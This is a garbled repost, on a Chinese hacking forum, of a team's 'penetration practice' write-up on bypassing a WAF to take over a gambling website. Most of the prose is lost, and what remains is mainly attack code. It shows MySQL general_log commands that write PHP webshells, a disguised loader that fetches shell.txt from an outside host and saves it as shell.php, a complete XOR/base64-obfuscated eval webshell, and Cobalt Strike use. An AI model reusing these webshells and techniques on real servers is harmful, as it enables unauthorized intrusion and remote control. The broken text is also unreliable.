搜索

[18022] 2021-07-05_【渗透实战系列】|13-waf绕过拿下赌博网站

文档创建者:s7ckTeam
浏览次数:32
最后更新:2025-01-18
2021-07-05_【渗透实战系列】|13-waf绕过拿下赌博网站 1 3 - w a f n e w l i f e s   H a c k i n g   2 0 2 1 - 0 7 - 0 5 j s p h p m y a d m i n s h e l l w a f , s h e l l c o b a l t   s t r i k e x . x . x . x
  p h p , u p u p w p h p s t u d y p h p i n f o u p u p w   - - >   p m d   p h p s t u d y   - - >   p h p m y a d m i n u . p h p r o o t / r o o t
p h p i n f o p h p m y a d m i n s h e l l g e t s h e l l s h e l l
    w a f t x t p h p s h e l l s e t   g l o b a l   g e n e r a l _ l o g = ' o n ' ; S E T   g l o b a l   g e n e r a l _ l o g _ f i l e = ' D : / x x x x / W W W / c m d . p h p ' ; S E L E C T   ' < ? p h p   a s s e r t ( $ _ P O S T [ " c m d " ] ) ; ? > ' ;
w a f , s h e l l s q l w a f w a f p h p w a f J a v a S c r i p t p h p 访 1 1 . p h p   s h e l l . p h p s h e l l s h e l l S E T   g l o b a l   g e n e r a l _ l o g _ f i l e = ' C : / U s e r s / A d m i n i s t r a t o r / D e s k t o p / U P U P W _ A P 5 . 5 _ 6 4 / h t d o c s / 1 1 . p h p ' ; S E L E C T   ' < s c r i p t   l a n g u a g e = " p h p " >   $ a = " h t t p : / / x . x . x . x : 8 1 / s h e l l . t x t " ; $ b = " f i l e " . " _ g " . " e t _ " . " c o n t e n t s " ; $ b   =   $ b ( $ a ) ; f i l e _ p u t _ c o n t e n t s ( " s h e l l . p h p " , $ b ) ;   < / s c r i p t > '
< ? p h p         s e s s i o n _ s t a r t ( ) ;         @ s e t _ t i m e _ l i m i t ( 0 ) ;         @ e r r o r _ r e p o r t i n g ( 0 ) ;         f u n c t i o n   E ( $ D , $ K ) {                 f o r ( $ i = 0 ; $ i < s t r l e n ( $ D ) ; $ i + + )   {                         $ D [ $ i ]   =   $ D [ $ i ] ^ $ K [ $ i + 1 & 1 5 ] ;                 }                 r e t u r n   $ D ;         }         f u n c t i o n   Q ( $ D ) {                 r e t u r n   b a s e 6 4 _ e n c o d e ( $ D ) ;         }         f u n c t i o n   O ( $ D ) {                 r e t u r n   b a s e 6 4 _ d e c o d e ( $ D ) ;         }         $ P = ' p a s s ' ;         $ V = ' p a y l o a d ' ;         $ T = ' 3 c 6 e 0 b 8 a 9 c 1 5 2 2 4 a ' ;         i f   ( i s s e t ( $ _ P O S T [ $ P ] ) ) {                 $ F = O ( E ( O ( $ _ P O S T [ $ P ] ) , $ T ) ) ;                 i f   ( i s s e t ( $ _ S E S S I O N [ $ V ] ) ) {                         $ L = $ _ S E S S I O N [ $ V ] ;                         $ A = e x p l o d e ( ' | ' , $ L ) ;                         c l a s s   C { p u b l i c   f u n c t i o n   n v o k e ( $ p )   { e v a l ( $ p . " " ) ; } }                         $ R = n e w   C ( ) ;                         $ R - > n v o k e ( $ A [ 0 ] ) ;                         e c h o   s u b s t r ( m d 5 ( $ P . $ T ) , 0 , 1 6 ) ;                         e c h o   Q ( E ( @ r u n ( $ F ) , $ T ) ) ;                         e c h o   s u b s t r ( m d 5 ( $ P . $ T ) , 1 6 ) ;                 } e l s e {                         $ _ S E S S I O N [ $ V ] = $ F ;                 }         }
w a f s y s t e m
,

w a f 3 6 0 w e b s c a n
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理